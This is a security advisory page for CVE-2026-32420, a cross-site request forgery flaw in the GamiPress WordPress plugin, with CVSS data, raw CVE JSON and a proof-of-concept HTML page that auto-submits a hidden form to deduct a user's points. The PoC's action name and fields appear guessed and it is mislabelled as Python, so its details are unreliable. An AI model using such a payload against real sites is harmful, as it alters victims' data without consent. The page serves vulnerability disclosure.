Security Vulnerability Report
中文
CVE-2026-32420 CVSS 5.4 MEDIUM

CVE-2026-32420

Published: 2026-03-13 19:55:00
Last Modified: 2026-04-22 21:30:26

Description

Cross-Site Request Forgery (CSRF) vulnerability in Ruben Garcia GamiPress gamipress allows Cross Site Request Forgery.This issue affects GamiPress: from n/a through <= 7.6.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

GamiPress <= 7.6.6 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-32420 - GamiPress CSRF Vulnerability --> <!-- This PoC demonstrates how an attacker can trick an authenticated admin into performing unintended actions --> <!DOCTYPE html> <html> <head> <title>GamiPress CSRF PoC - CVE-2026-32420</title> </head> <body> <h1>GamiPress CSRF Vulnerability Test - CVE-2026-32420</h1> <p>This PoC demonstrates the CSRF vulnerability in GamiPress plugin <= 7.6.6</p> <!-- Example: Auto-submit form to trigger unintended admin action --> <form id="csrf-form" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- GamiPress nonce validation is missing or insufficient --> <input type="hidden" name="action" value="gamipress_update_user_points"> <input type="hidden" name="user_id" value="1"> <input type="hidden" name="points" value="-1000"> <input type="hidden" name="points_type" value="gamipress_points"> </form> <script> // Auto-submit form when page loads document.getElementById('csrf-form').submit(); console.log('CSRF request sent - CVE-2026-32420'); </script> <p>If you see this message, the PoC has been executed.</p> <p>Check the target site's user points for unauthorized deductions.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32420", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:59.697", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Ruben Garcia GamiPress gamipress allows Cross Site Request Forgery.This issue affects GamiPress: from n/a through <= 7.6.6."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Ruben Garcia GamiPress gamipress permite la falsificación de petición en sitios cruzados. Este problema afecta a GamiPress: desde n/d hasta &lt;= 7.6.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gamipress/vulnerability/wordpress-gamipress-plugin-7-6-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}